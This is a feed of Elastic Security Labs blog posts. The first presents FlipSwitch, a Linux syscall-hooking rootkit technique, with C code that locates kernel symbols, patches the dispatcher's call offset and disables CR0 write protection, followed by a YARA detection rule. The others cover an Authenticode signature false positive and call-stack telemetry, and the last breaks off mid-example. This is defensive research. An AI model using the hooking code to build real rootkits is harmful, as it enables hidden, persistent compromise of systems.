Elastic Security Labs - Internals

FlipSwitch: a Novel Syscall Hooking Technique

Tue, 30 Sep 2025 00:00:00 GMT

FlipSwitch: a Novel Syscall Hooking Technique

Syscall hooking, particularly by overwriting pointers to syscall handlers, has been a cornerstone of Linux rootkits like Diamorphine and PUMAKIT, enabling them to hide their presence and control the flow of information. While other hooking mechanisms exist, such as ftrace and eBPF, each has its own pros and cons, and most have some form of limitation. Function pointer overwrites remain the most effective and simple way of hooking syscalls in the kernel.

However, the Linux kernel is a moving target. With each new release, the community introduces changes that can render entire classes of malware obsolete overnight. This is precisely what happened with the release of Linux kernel 6.9, which introduced a fundamental change to the syscall dispatch mechanism for x86-64 architecture, effectively neutralizing traditional syscall hooking methods.

The Walls Are Closing In: The Death of a Classic Hooking Technique

To appreciate the significance of the changes in kernel 6.9, let's first revisit the classic method of syscall hooking. For years, the kernel used a simple array of function pointers called the sys_call_table to dispatch syscalls. The logic was beautifully simple, as seen in the kernel source:

// Pre-6.9: Direct array lookup
sys_call_table[__NR_kill](regs);

A rootkit could locate this table in memory, disable write protection, and overwrite the address of a syscall like kill or getdents64 with a pointer to its own adversary-controlled function. This empowers a rootkit to filter the output of the ls command to hide malicious files or prevent a specific process from being terminated, for example. But the directness of this mechanism was also its weakness. With Linux kernel 6.9, the game changed completely when the direct array lookup was replaced with a more efficient and secure switch statement-based dispatch mechanism:

// Kernel 6.9+: Switch-statement dispatch
long x64_sys_call(const struct pt_regs *regs, unsigned int nr)
{
    switch (nr) {
    #include  // Expands to case statements
    default: return __x64_sys_ni_syscall(regs);
    }
}

This change, while seemingly subtle, was a death blow to traditional syscall hooking. The sys_call_table still exists for compatibility with tracing tools, but it is no longer used for the actual dispatch of syscalls. Any modifications to it are simply ignored.

Finding a New Way In: The FlipSwitch Technique

We knew that the kernel still had to call the original syscall functions somehow. The logic was still there, just hidden behind a new layer of indirection. This led to the development of FlipSwitch, a technique that bypasses the new switch statement implementation by directly patching the compiled machine code of the kernel's syscall dispatcher.

Here's a breakdown of how it works:

The first step is to find the address of the original syscall function we want to hook. Ironically, the now-defunct sys_call_table is the perfect tool for this. We can still look up the address of sys_kill in this table to get a reliable pointer to the original function.

A common method to locate kernel symbols is the kallsyms_lookup_name function. This function provides a programmatic way to find the address of any exported kernel symbol by its name. For instance, we can use kallsyms_lookup_name("sys_kill") to obtain the address of the sys_kill function, providing a flexible and reliable way to obtain function pointers even when the sys_call_table is not directly usable for dispatch.

It's important to note that kallsyms_lookup_name is generally not exported by default, meaning it's not directly accessible to loadable kernel modules. This restriction enhances kernel security. However, a common technique to indirectly access kallsyms_lookup_name is by using a kprobe. By placing a kprobe on a known kernel function, a module can then use the kprobe's internal structure to derive the address of the original, probed function. From this, a function pointer to kallsyms_lookup_name can often be obtained through careful analysis of the kernel's memory layout, such as by examining nearby memory regions relative to the probed function's address.

/**
 * Find the address of kallsyms_lookup_name using kprobes
 * @return Pointer to kallsyms_lookup_name function or NULL on failure
 */
void *find_kallsyms_lookup_name(void)
{
    struct kprobe *kp;
    void *addr;

    kp = kzalloc(sizeof(*kp), GFP_KERNEL);
    if (!kp)
        return NULL;

    kp->symbol_name = O_STRING("kallsyms_lookup_name");
    if (register_kprobe(kp) != 0) {
        kfree(kp);
        return NULL;
    }

    addr = kp->addr;
    unregister_kprobe(kp);
    kfree(kp);

    return addr;
}

After finding the address of kallsyms_lookup_name, we can use it to find pointers to the symbols that we need to continue the process of placing a hook.

With the target address in hand, we then turn our attention to the x64_sys_call function, the new home of the syscall dispatch logic. We begin to scan its raw machine code, byte by byte, looking for a call instruction. On x86-64, the call instruction has a specific one-byte opcode: 0xe8. This byte is followed by a 4-byte relative offset that tells the CPU where to jump to.

This is where the magic happens. We're not just looking for any call instruction. We're looking for a call instruction that, when combined with its 4-byte offset, points directly to the address of the original sys_kill function we found previously. This combination of the 0xe8 opcode and the specific offset is a unique signature within the x64_sys_call function. There is only one instruction that matches this pattern.

/* Search for call instruction to sys_kill in x64_sys_call */
    for (size_t i = 0; i < DUMP_SIZE - 4; ++i) {
        if (func_ptr[i] == 0xe8) { /* Found a call instruction */
            int32_t rel = *(int32_t *)(func_ptr + i + 1);
            void *call_addr = (void *)((uintptr_t)x64_sys_call + i + 5 + rel);
            
            if (call_addr == (void *)sys_call_table[__NR_kill]) {
                debug_printk("Found call to sys_kill at offset %zu\n", i);

Once we've located this unique instruction, we've found our insertion point. But before we can modify the kernel's code, we must bypass its memory protections. Since we are already executing within the kernel (ring 0), we can use a classic, powerful technique: disabling write protection by flipping a bit in the CR0 register. The CR0 register controls basic processor functions, and its 16th bit (Write Protect) prevents the CPU from writing to read-only pages. By temporarily clearing this bit, we permit ourselves to modify any part of the kernel's memory.

/**
 * Force write to CR0 register bypassing compiler optimizations
 * @param val Value to write to CR0
 */
static inline void write_cr0_forced(unsigned long val)
{
    unsigned long order;

    asm volatile("mov %0, %%cr0" 
        : "+r"(val), "+m"(order));
}

/**
 * Enable write protection (set WP bit in CR0)
 */
static inline void enable_write_protection(void)
{
    unsigned long cr0 = read_cr0();
    set_bit(16, &cr0);
    write_cr0_forced(cr0);
}

/**
 * Disable write protection (clear WP bit in CR0)
 */
static inline void disable_write_protection(void)
{
    unsigned long cr0 = read_cr0();
    clear_bit(16, &cr0);
    write_cr0_forced(cr0);
}

With write protection disabled, we overwrite the 4-byte offset of the call instruction with a new offset that points to our own fake_kill function. We have, in effect, "flipped the switch" inside the kernel's own dispatcher, redirecting a single syscall to our malicious code while leaving the rest of the system untouched.

This technique is both precise and reliable. And, significantly, all changes are fully reverted when the kernel module is unloaded, leaving no trace of its presence.

The development of FlipSwitch is a testament to the ongoing cat-and-mouse game between attackers and defenders. As kernel developers continue to harden the Linux kernel, attackers will continue to find new and creative ways to bypass these defenses. We hope that by sharing this research, we can help the security community stay one step ahead.

Detecting malware

Detecting rootkits once they have been loaded into the kernel is exceptionally difficult, as they are designed to operate stealthily and evade detection by security tools. However, we have developed a YARA signature to identify the proof-of-concept for FlipSwitch. This signature can be used to detect the presence of the FlipSwitch rootkit in memory or on disk.

YARA

Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the Flipswitch proof of concept.

rule Linux_Rootkit_Flipswitch_821f3c9e
{
	meta:
		author = "Elastic Security"
		description = "Yara rule to detect the FlipSwitch rootkit PoC"
		os = "Linux"
		arch = "x86"
		category_type = "Rootkit"
		family = "Flipswitch"
		threat_name = "Linux.Rootkit.Flipswitch"
		
	strings:
		$all_a = { FF FF 48 89 45 E8 F0 80 ?? ?? ?? 31 C0 48 89 45 F0 48 8B 45 E8 0F 22 C0 }
		$obf_b = { BA AA 00 00 00 BE 0D 00 00 00 48 C7 ?? ?? ?? ?? ?? 49 89 C4 E8 }
		$obf_c = { BA AA 00 00 00 BE 15 00 00 00 48 89 C3 E8 ?? ?? ?? ?? 48 89 DF 48 89 43 30 E8 ?? ?? ?? ?? 85 C0 74 0D 48 89 DF E8 }
		$main_b = { 41 54 53 E8 ?? ?? ?? ?? 48 C7 C7 ?? ?? ?? ?? 49 89 C4 E8 ?? ?? ?? ?? 4D 85 E4 74 2D 48 89 C3 48 85 }
		$main_c = { 48 85 C0 74 1F 48 C7 ?? ?? ?? ?? ?? ?? 48 89 C7 48 89 C3 E8 ?? ?? ?? ?? 85 C0 74 0D 48 89 DF E8 ?? ?? ?? ?? 45 31 E4 EB 14 }
		$debug_b = { 48 89 E5 41 54 53 48 85 C0 0F 84 ?? ?? 00 00 48 C7 }
		$debug_c = { 48 85 C0 74 45 48 C7 ?? ?? ?? ?? ?? ?? 48 89 C7 48 89 C3 E8 ?? ?? ?? ?? 85 C0 75 26 48 89 DF 4C 8B 63 28 E8 ?? ?? ?? ?? 48 89 DF E8 }

	condition:
		#all_a>=2 and (1 of ($obf_*) or 1 of ($main_*) or 1 of ($debug_*))
}

References

The following were referenced throughout the above research:

Investigating a Mysteriously Malformed Authenticode Signature

Thu, 04 Sep 2025 00:00:00 GMT

Introduction

Elastic Security Labs recently encountered a signature validation issue with one of our Windows binaries. The executable was signed using signtool.exe as part of our standard continuous integration (CI) process, but on this occasion, the output file failed signature validation with the following error message:

The digital signature of the object is malformed. For technical detail, see security bulletin MS13-098.

The documentation for MS13-098 is vague, but it describes a potential vulnerability related to malformed Authenticode signatures. Nothing obvious had changed on our end that might explain this new error, so we needed to investigate the cause and resolve the issue.

While we identified that this issue was affecting one of our signed Windows binaries, it could impact any binary. We are publishing this research as a reference for anyone else who may encounter the same problem in the future.

Diagnosis

To investigate further, we created a basic test program that called the Windows WinVerifyTrust function against the problematic executable to manually validate the signature. This revealed that it was failing with the error code TRUST_E_MALFORMED_SIGNATURE.

WinVerifyTrust is a complex function, but after attaching a debugger, we discovered that the error code was being set at the following point:

dwReserved1 = psSipSubjectInfo->dwReserved1;
if(!dwReserved1)
    goto LABEL_58;
v40 = I_GetRelaxedMarkerCheckFlags(a1, v22, (unsigned int *)&pvData);
if(v40 < 0)
    break;
if(!pvData)
    v42 = 0x80096011;    // TRUST_E_MALFORMED_SIGNATURE

As shown above, if psSipSubjectInfo->dwReserved1 is not 0, the code calls I_GetRelaxedMarkerCheckFlags. If this function returns no data, the code sets the TRUST_E_MALFORMED_SIGNATURE error and exits.

When stepping through the code with our problematic binary, we saw that dwReserved1 was indeed set to 1. Running the same test against a correctly signed binary, this value was always 0, which skips the call to I_GetRelaxedMarkerCheckFlags.

Looking into I_GetRelaxedMarkerCheckFlags, we saw that it simply checks for the presence of a specific attribute: 1.3.6.1.4.1.311.2.6.1. A quick online search turned up very little other than the fact that this object identifier (OID) is labeled as SpcRelaxedPEMarkerCheck.

__int64 __fastcall I_GetRelaxedMarkerCheckFlags(struct _CRYPT_PROVIDER_DATA *a1, DWORD a2, unsigned int *a3)
{
    unsigned int v4; // ebx
    CRYPT_PROVIDER_SGNR *ProvSignerFromChain; // rax
    PCRYPT_ATTRIBUTE Attribute; // rax
    signed int LastError; // eax
    DWORD pcbStructInfo; // [rsp+60h] [rbp+18h] BYREF

    pcbStructInfo = 4;
    v4 = 0;
    *a3 = 0;
    ProvSignerFromChain = WTHelperGetProvSignerFromChain(a1, a2, 0, 0);
    if(ProvSignerFromChain)
    {
        Attribute = CertFindAttribute(
            "1.3.6.1.4.1.311.2.6.1",
            ProvSignerFromChain->psSigner->AuthAttrs.cAttr,
            ProvSignerFromChain->psSigner->AuthAttrs.rgAttr);
        if(Attribute)
        {
            if(!CryptDecodeObject(
                a1->dwEncoding,
                (LPCSTR)0x1B,
                Attribute->rgValue->pbData,
                Attribute->rgValue->cbData,
                0,
                a3,
                &pcbStructInfo))
            {
                return HRESULT_FROM_WIN32(GetLastError());
            }
        }
    }

    return v4;
}

Our binary did not have this attribute, which caused the function to return no data and triggered the error. The function names reminded us of an optional parameter that we had previously seen in signtool.exe:

/rmc - Specifies signing a PE file with the relaxed marker check semantic. The flag is ignored for non-PE files. During verification, certain authenticated sections of the signature will bypass invalid PE markers check. This option should only be used after careful consideration and reviewing the details of MSRC case MS12-024 to ensure that no vulnerabilities are introduced.

Based on our analysis, we suspected that re-signing the executable with the “relaxed marker check” flag (/rmc), and as expected, the signature was now valid.

Root cause analysis

While the workaround above resolved our immediate problem, it clearly wasn’t the root cause. We needed to investigate further to understand why the internal dwReserved1 flag was set in the first place.

This field is part of the SIP_SUBJECTINFO structure, which is documented on MSDN - but unfortunately, it didn’t help much in this case:

To find where this field was being set, we worked backwards and identified a point where dwReserved1 was still 0 - i.e., before the flag had been set. We placed a hardware breakpoint (on write) on the dwReserved1 field and resumed execution. The breakpoint was hit in the SIPObjectPE_::GetMessageFromFile function:

__int64 __fastcall SIPObjectPE_::GetMessageFromFile(
    SIPObjectPE_ *this,
    struct SIP_SUBJECTINFO_ *a2,
    struct _WIN_CERTIFICATE *a3,
    unsigned int a4,
    unsigned int *a5)
{
    __int64 v5; // rcx
    __int64 result; // rax
    DWORD v8; // [rsp+40h] [rbp+8h] BYREF

    v5 = *((_QWORD*)this + 1);
    v8 = 0;
    result = ImageGetCertificateDataEx(v5, a4, a3, a5, &v8);
    if((_DWORD)result)
        a2->dwReserved1 = v8;

    return result;
}

This function calls the ImageGetCertificateDataEx API which is exported by imagehlp.dll. The value returned by the fifth parameter of this function is stored in dwReserved1. This value ultimately determines whether the PE is considered "malformed" in the manner we have been observing.

Unfortunately, ImageGetCertificateDataEx is undocumented on MSDN. However, an earlier variant, ImageGetCertificateData, is documented:

BOOL IMAGEAPI ImageGetCertificateData(
  [in]      HANDLE            FileHandle,
  [in]      DWORD             CertificateIndex,
  [out]     LPWIN_CERTIFICATE Certificate,
  [in, out] PDWORD            RequiredLength
);

This function extracts the contents of the IMAGE_DIRECTORY_ENTRY_SECURITY directory from the PE headers. Manual analysis of the ImageGetCertificateDataEx function showed that the first four parameters match those of ImageGetCertificateData, but with one additional output parameter at the end.

We wrote a simple test program that allows us to call this function and perform checks against the unknown fifth parameter:

#include 
#include 
#include 

int main()
{
    HANDLE hFile = NULL;
    DWORD dwCertLength = 0;
    WIN_CERTIFICATE *pCertData = NULL;
    DWORD dwUnknown = 0;
    BOOL (WINAPI *pImageGetCertificateDataEx)(HANDLE FileHandle, DWORD CertificateIndex, LPWIN_CERTIFICATE Certificate, PDWORD RequiredLength, DWORD *pdwUnknown);

    // open target executable
    hFile = CreateFileA("C:\\users\\matthew\\sample-executable.exe", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    if(hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed to open input file\n");
        return 1;
    }

    // locate ImageGetCertificateDataEx export in imagehlp.dll
    pImageGetCertificateDataEx = (BOOL(WINAPI*)(HANDLE,DWORD,LPWIN_CERTIFICATE,PDWORD,DWORD*))GetProcAddress(LoadLibraryA("imagehlp.dll"), "ImageGetCertificateDataEx");
    if(pImageGetCertificateDataEx == NULL)
    {
        printf("Failed to locate ImageGetCertificateDataEx\n");
        return 1;
    }

    // get required length
    dwCertLength = 0;
    if(pImageGetCertificateDataEx(hFile, 0, NULL, &dwCertLength, &dwUnknown) == 0)
    {
        if(GetLastError() != ERROR_INSUFFICIENT_BUFFER)
        {
            printf("ImageGetCertificateDataEx error (1)\n");
            return 1;
        }
    }

    // allocate data
    printf("Allocating %u bytes for certificate...\n", dwCertLength);
    pCertData = (WIN_CERTIFICATE*)malloc(dwCertLength);
    if(pCertData == NULL)
    {
        printf("Failed to allocate memory\n");
        return 1;
    }

    // read certificate data and dwUnknown flag
    if(pImageGetCertificateDataEx(hFile, 0, pCertData, &dwCertLength, &dwUnknown) == 0)
    {
        printf("ImageGetCertificateDataEx error (2)\n");
        return 1;
    }

    printf("Finished - dwUnknown: %u\n", dwUnknown);

    return 0;
}

Running this against a variety of executables confirmed our expectations: the unknown return value was 1 for our “broken” executable, and 0 for correctly signed binaries. This confirmed that the issue originated somewhere within the ImageGetCertificateDataEx function.

Further analysis of this function revealed that the unknown flag is being set by another internal function: IsBufferCleanOfInvalidMarkers.

...
if(!IsBufferCleanOfInvalidMarkers(v25, v15, pdwUnknown))
{
    LastError = GetLastError();
    if(!pdwUnknown)
        goto LABEL_34;
}
...

After cleaning up the IsBufferCleanOfInvalidMarkers function, we observed the following:

DWORD IsBufferCleanOfInvalidMarkers(BYTE *pData, DWORD dwLength, DWORD *pdwInvalidMarkerFound)
{
    if(!_InterlockedCompareExchange64(&global_InvalidMarkerList, 0, 0))
        LoadInvalidMarkers();

    if(!RabinKarpFindPatternInBuffer(pData, dwLength, pdwInvalidMarkerFound))
        return 1;

    SetLastError(0x80096011); // TRUST_E_MALFORMED_SIGNATURE

    return 0;
}

This function loads a global list of "invalid markers" using LoadInvalidMarkers, if they are not already loaded. imagehlp.dll contains a hardcoded default list of markers, but also checks the registry for a user-defined list at the following path:

HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config\PECertInvalidMarkers

This registry value does not appear to exist by default.

The function then performs a search across the entire PE signature data, looking for any of these markers. If a match is found, pdwInvalidMarkerFound is set to 1, which maps directly to the psSipSubjectInfo->dwReserved1 value mentioned earlier.

Dumping the invalid markers

The markers are stored in an undocumented structure inside imagehlp.dll. After reverse-engineering the RabinKarpFindPatternInBuffer function noted above, we wrote a small tool to dump the entire list of markers:

#include 
#include 

int main()
{
    HMODULE hModule = LoadLibraryA("imagehlp.dll");

    // hardcoded address - imagehlp.dll version:
    // 509ef25f9bac59ebf1c19ec141cb882e5c1a8cb61ac74a10a9f2bd43ed1f0585
    BYTE *pInvalidMarkerData = (BYTE*)hModule + 0xC4D8;

    BYTE *pEntryList = (BYTE*)*(DWORD64*)(pInvalidMarkerData + 20);
    DWORD dwEntryCount = *(DWORD*)pInvalidMarkerData;
    for(DWORD i = 0; i < dwEntryCount; i++)
    {
        BYTE *pCurrEntry = pEntryList + (i * 18);
        BYTE bLength = *(BYTE*)(pCurrEntry + 9);
        BYTE *pString = (BYTE*)*(DWORD64*)(pCurrEntry + 10);
        for(DWORD ii = 0; ii < bLength; ii++)
        {
            if(isprint(pString[ii]))
            {
                // printable character
                printf("%c", pString[ii]);
            }
            else
            {
                // non-printable character
                printf("\\x%02X", pString[ii]);
            }
        }
        printf("\n");
    }

    return 0;
}

This produced the following results:

PK\x01\x02
PK\x05\x06
PK\x03\x04
PK\x07\x08
Rar!\x1A\x07\x00
z\xBC\xAF'\x1C
**ACE**
!\x0A
MSCF\x00\x00\x00\x00
\xEF\xBE\xAD\xDENull
Initializing Wise Installation Wizard
zlb\x1A
KGB_arch
KGB2\x00
KGB2\x01
ENC\x00
disk%i.pak
>-\x1C\x0BxV4\x12
ISc(
Smart Install Maker
\xAE\x01NanoZip
;!@Install@
EGGA
ArC\x01
StuffIt!
-sqx-
PK\x09\x0A
"\x0B\x01\x0B
-lh0-
-lh1-
-lh2-
-lh3-
-lh4-
-lh5-
-lh6-
-lh7-
-lh8-
-lh9-
-lha-
-lhb-
-lhc-
-lhd-
-lhe-
-lzs-
-lz2-
-lz3-
-lz4-
-lz5-
-lz7-
-lz8-
<#$@@$#>

As expected, this appears to be a list of magic values pertaining to old installers and compressed archive formats. This aligns with the description of MS13-098, which hints towards certain installers being affected.

We suspected this was related to self-extracting executables. If an executable reads itself from disk and scans its own data for an embedded archive (e.g., a ZIP file), an attacker could potentially append malicious data to the signature section without invalidating the signature - since signature data cannot hash itself. This could potentially cause the vulnerable executable to locate the malicious data before the original data, especially if it scans backwards from the end of the file.

We later found an old RECon talk from 2012 by Igor Glücksmann, which describes this exact scenario and appears to confirm our hypothesis.

Microsoft's fix involved scanning the PE signature block for known byte patterns that could indicate this type of abuse.

Investigating the false positive

Upon further debugging, we discovered that the binary was being flagged due to the signature data containing the EGGA marker from the list above:

In the context of the list of markers above, the EGGA signature appears to relate to a specific header value used by an archive format called ALZip. Our code does not make any use of this file format.

Microsoft’s heuristic treated the presence of EGGA as evidence that malicious archive data had been embedded in the PE signature. In practice, nothing of the sort was present. The signature block itself happened to include those four bytes as part of the hashed data.

Collisions like this are unusual, but page hashing (/ph) made it more likely. By expanding the size of the signature block, page hashing increases the surface area for coincidental matches and increases the likelihood of triggering the heuristic.

The binary didn’t contain any self-extracting routines, so the hit on EGGA was a false positive. In that context, the warning had no bearing on the file’s integrity. This meant it was safe to re-sign the file with /rmc to restore the expected validation.

Conclusion

It is well known that additional data can be embedded in a PE file without breaking its signature by appending it to the security block. Even some legitimate software products take advantage of this to embed user-specific metadata into signed executables. However, we were not aware that Microsoft had implemented heuristics to detect specific malicious cases of this, even though they were introduced back in 2012.

The original error message was very vague, and we were unable to find any documentation or references online that helped explain the behavior. Even searching for the associated registry value after discovering it (PECertInvalidMarkers) yielded zero results.

What we uncovered is that Microsoft added heuristic scanning of signature blocks more than a decade ago to counter specific abuse cases. Those heuristics reside in a hardcoded list of “invalid markers,” many of which are tied to outdated installers and archive formats. Our binary happened to collide with one of those markers when signed with page hashing enabled, creating a validation failure with no clear documentation and no public references to the underlying registry key or detection logic.

The absence of online discussions regarding this failure mode, aside from a single unresolved Visual Studio Developer Community post from 2018, made the initial diagnosis difficult. By publishing this analysis, we want to provide a technical reference point for others who may encounter the same problem. In our case, resolving the issue required deep troubleshooting that few outside this space would normally need to exercise. For teams automating code signing, the key lesson is to integrate signature validation checks early and be aware that heuristic marker detection can lead to edge-case failures.

Additional references

The author can be found on X at @x86matthew.

Call Stacks: No More Free Passes For Malware

Thu, 12 Jun 2025 00:00:00 GMT

Call stacks provide the who

One of Elastic’s key Windows endpoint telemetry differentiators is call stacks.

Most detections rely on what is happening — and this is often insufficient as most behaviours are dual purpose. With call stacks, we add the fine-grained ability to also determine who is performing the activity. This combination gives us an unparalleled ability to uncover malicious activity. By feeding this deep telemetry to Elastic Defend’s on-host rule engine, we can quickly respond to emerging threats.

Call stacks are a beautiful lie

In computer science, a stack is a last-in, first-out data structure. Similar to a stack of physical items, it is only possible to add or remove the top element. A call stack is a stack that contains information about the currently active subroutine calls.

On x64 hosts, this call stack can only be accurately generated using execution tracing features on the CPU, such as Intel LBR, Intel BTS, Intel AET, Intel IPT, and x64 Architectural LBR. These tracing features were designed for performance profiling and debugging purposes, but can be used in some security scenarios as well. However, what is more generally available is an approximate call stack that is recovered from a thread’s data stack via a mechanism called stack walking.

In the x64 architecture, the “stack pointer register” (rsp) unsurprisingly points to a stack data structure, and there are efficient instructions to read and write the data on this stack. Additionally, the call instruction transfers control to a new subroutine but also saves a return address at the memory address referenced by the stack pointer. A ret instruction will later retrieve this saved address so that execution can return to where it left off. Functions in most programming languages are typically implemented using these two instructions, and both function parameters and local function variables will typically be allocated on this stack for performance. The portion of the stack related to a single function is called a stack frame.

Stack walking is the recovery of just the return addresses from the heterogeneous data stored on the thread stack. Return addresses need to be stored somewhere for control flow — so stack walking co-opts this existing data to approximate a call stack. This is entirely suitable for most debugging and performance profiling scenarios, but slightly less helpful for security auditing. The main issue is that you can’t disassemble backwards. You can always determine the return address for a given call site, but not the converse. The best approach you can take is to check each of the 15 possible preceding instruction lengths and see which disassembles to exactly one call instruction. Even then, all you have recovered is a previous call site — not necessarily the exact preceding call site. This is because most compilers use tail call optimisation to omit unnecessary stack frames. This creates annoying scenarios for security like there being no guarantee that the Win32StartAddress function will be on the stack even though it was called.

So what we usually refer to as a call stack is actually a return address stack.

Malware authors use this ambiguity to lie. They either craft trampoline stack frames through legitimate modules to hide calls originating from malicious code, or they coerce stack walking into predicting different return addresses than those the CPU will execute. Of course, malware has always just been an attempt to lie, and antimalware is just the process of exposing that lie.

“... but at the length truth will out.” - William Shakespeare, The Merchant of Venice, Act 2, Scene 2

Making call stacks beautiful

So far, a stack walk is just a list of numeric memory addresses. To make them useful for analysis we need to enrich them with context. (Note: we don’t currently include kernel stack frames.)

The minimum useful enrichment is to convert these addresses into offsets within modules (e.g. ntdll.dll+0x15c9c4). This would only catch the most egregious malware though — we can go deeper. The most important modules on Windows are those that implement the Native and Win32 APIs. The application binary interface for these APIs requires that the name of each function be included in the Export Directory of the containing module. This is the information that Elastic currently uses to enrich its endpoint call stacks.

A more accurate enrichment could be achieved by using the public symbols (if available) hosted on the vendor’s infrastructure (especially Microsoft) While this method offers deeper fidelity, it comes with higher operational costs and isn’t feasible for our air-gapped customers.

A rule of thumb for Microsoft kernel and native symbols is that the exported interface of each component has a capitalised prefix such as Ldr, Tp or Rtl. Private functions extend this prefix with a p. By default, private functions with external linkage are included in the public symbol table. A very large offset might indicate a very large function, but it could also just indicate an unnamed function that you don’t have symbols for. A general guideline would be to consider any triple-digit and larger offsets in an exported function as likely belonging to another function.

Call Stack	Stack Walk	Stack Walk Modules	Stack Walk Exports (Elastic approach)	Stack Walk Public Symbols
0x7ffb8eb9c9c2 0x12d383f0046 0x7ffb8eb1a9d8 0x7ffb8eb1aaf4 0x7ffb8ea535ff 0x7ffb8da5e8cf 0x7ffb8eaf14eb	0x7ffb8eb9c9c4 0x7ffb8c3c71d6 0x7ffb8eb1a9ed 0x7ffb8eb1aaf9 0x7ffb8ea53604 0x7ffb8da5e8d4 0x7ffb8eaf14f1	ntdll.dll+0x15c9c4 kernelbase.dll+0xc71d6 ntdll.dll+0xda9ed ntdll.dll+0xdaaf9 ntdll.dll+0x13604 kernel32.dll+0x2e8d4 ntdll.dll+0xb14f1	ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlAddRefActivationContext+0x40d ntdll.dll!RtlAddRefActivationContext+0x519 ntdll.dll!RtlAcquireSRWLockExclusive+0x974 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21	ntdll.dll!NtProtectVirtualMemory+0x14 kernelbase.dll!VirtualProtect+0x36 ntdll.dll!RtlTpTimerCallback+0x7d ntdll.dll!TppTimerpExecuteCallback+0xa9 ntdll.dll!TppWorkerThread+0x644 kernel32.dll!BaseThreadInitThunk+0x14 ntdll.dll!RtlUserThreadStart+0x21

Comparison of Call Stack Enrichment Levels

In the above example, the shellcode at 0x12d383f0000 deliberately used a tail call so that its address wouldn’t appear in the stack walk. This lie-by-omission is apparent even with only the stalk walk. Elastic reports this with the proxy_call heuristic as the malware registered a timer callback function to proxy the call to VirtualProtect from a different thread.

Making call stacks powerful

The call stacks of the system calls that we monitor with Event Tracing for Windows (ETW) have an expected structure. At the bottom of the stack is the thread StartAddress - typically ntdll.dll!RtlUserThreadStart. This is followed by the Win32 API thread entry - kernel32.dll!BaseThreadInitThunk and then the first user module. A user module is application code that is not part of the Win32 (or Native) API. This first user module should match the thread’s Win32StartAddress (unless that function used a tail call). More user modules will follow until the final user module makes a call into a Win32 API that makes a Native API call, which finally results in a system call to the kernel.

From a detection standpoint, the most important module in this call stack is the final user module. Elastic shows this module, including its hash and any code signatures. These details aid in alert triage, but more importantly, they drastically improve the granularity at which we can baseline the behaviours of legitimate software that sometimes behaves like malware. The more accurately we can baseline normal, the harder it is for malware to blend in.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|kernelbase.dll|file.dll|rundll32.exe|kernel32.dll|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!NtAllocateVirtualMemory+0x14" }, /* Native API */
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAllocExNuma+0x62" }, /* Win32 API */
      { "symbol_info": "c:\\windows\\system32\\kernelbase.dll!VirtualAllocEx+0x16" }, /* Win32 API */
      {
        "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x160d8b", /* final user module */
        "callsite_trailing_bytes": "488bf0488d4d88e8197ee2ff488bc64883c4685b5e5f415c415d415e415f5dc390909090905541574156415541545756534883ec58488dac2490000000488b71",
        "callsite_leading_bytes": "088b4d38894c2420488bca48894db8498bd0488955b0458bc1448945c4448b4d3044894dc0488d4d88e8e77de2ff488b4db8488b55b0448b45c4448b4dc0ffd6"
      },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x7b429" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x44a9" },
      { "symbol_info": "c:\\users\\user\\desktop\\file.dll+0x5f58" },
      { "symbol_info": "c:\\windows\\system32\\rundll32.exe+0x3bcf" },
      { "symbol_info": "c:\\windows\\system32\\rundll32.exe+0x6309" }, /* first user module - typically the ETHREAD.Win32StartAddress module */
      { "symbol_info": "c:\\windows\\system32\\kernel32.dll!BaseThreadInitThunk+0x14" }, /* Win32 API */
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!RtlUserThreadStart+0x21" /* Native API - the ETHREAD.StartAddress module */
      }
    ],
    "call_stack_final_user_module": {
      "path": "c:\\users\\user\\desktop\\file.dll",
      "code_signature": [ { "exists": false } ],
      "name": "file.dll",
      "hash": { "sha256": "0240cc89d4a76bafa9dcdccd831a263bf715af53e46cac0b0abca8116122d242" }
    }
  }
}

Sample enriched call stack

Call stack final user module enrichments:

name	The file name of the call_stack_final_user_module. Can also be "Unbacked" indicating private executable memory, or "Undetermined" indicating a suspicious call stack.
path	The file path of the call_stack_final_user_module.
hash.sha256	The sha256 of the call_stack_final_user_module, or the protection_provenance module if any.
code_signature	Code signature of the call_stack_final_user_module, or the protection_provenance module if any.
allocation_private_bytes	The number of bytes in this memory region that are both +X and non-shareable. Non-zero values can indicate code hooking, patching, or hollowing.
protection	The memory protection for the acting region of pages is included if it is not RX. Corresponds to MEMORY_BASIC_INFORMATION.Protect.
protection_provenance	The name of the memory region that caused the last modification of the protection of this page. "Unbacked" may indicate shellcode.
protection_provenance_path	The path of the module that caused the last modification of the protection of this page.
reason	The anomalous call_stack_summary that led to an "Undetermined" protection_provenance.

A quick call stack glossary

When examining call stacks, there are some Native API functions that are helpful to be familiar with. Ken Johnson, now of Microsoft, has provided us with a catalog of NTDLL kernel mode to user mode callbacks to get us started. Seriously, you should pause here and go read that first.

We met RtlUserThreadStart earlier. Both it and its sibling RtlUserFiberStart should only ever appear at the bottom of a call stack. These are the entrypoints for user threads and fibers, respectively. The first instruction on every thread, however, is actually LdrInitializeThunk. After performing the user-mode component of thread initialisation (and process, if required), this function transfers control to the entrypoint via NtContinue, which updates the instruction pointer directly. This means that it does not appear in any future stack walks.

So if you see a call stack that includes LdrInitializeThunk then this means you are at the very start of a thread’s execution. This is where the application compatibility Shim Engine operates, where hook-based security products prefer to install themselves, and where malware tries to gain execution before those other security products. Marcus Hutchins and Guido Miggelenbrink have both written excellent blogs on this topic. This startup race does not exist for security products that utilise kernel ETW for telemetry.

{
  "process.thread.Ext": {
    "call_stack_summary": "ntdll.dll|file.exe|ntdll.dll",
    "call_stack": [
      { "symbol_info": "c:\\windows\\system32\\ntdll.dll!ZwProtectVirtualMemory+0x14" },
